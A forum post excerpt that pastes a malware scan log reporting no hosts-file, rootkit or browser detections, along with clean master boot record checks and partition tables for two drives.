 

¤¤¤ Hosts File : 0 ¤¤¤

 

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

 

¤¤¤ Web browsers : 0 ¤¤¤

 

¤¤¤ MBR Check : ¤¤¤

+++++ PhysicalDrive0:  +++++

--- User ---

[MBR] dd024e018e30dfaad67172ee7859e3c8

[bSP] 7c67bdb6eea5fc037f2fb1fde4966781 : Windows Vista/7/8 MBR Code

Partition table:

0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB

1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 953767 MB

User = LL1 ... OK

User = LL2 ... OK

 

+++++ PhysicalDrive1:  +++++

--- User ---

[MBR] 617240ae40078ba5b2d63715af595c39

[bSP] 130a6938a2838fcaeb361cefc3bc8c6d : Windows Vista/7/8 MBR Code

Partition table:

0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB

User = LL1 ... OK

User = LL2 ... OK
Link to post
Share on other sites

  • 3 months later...
Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.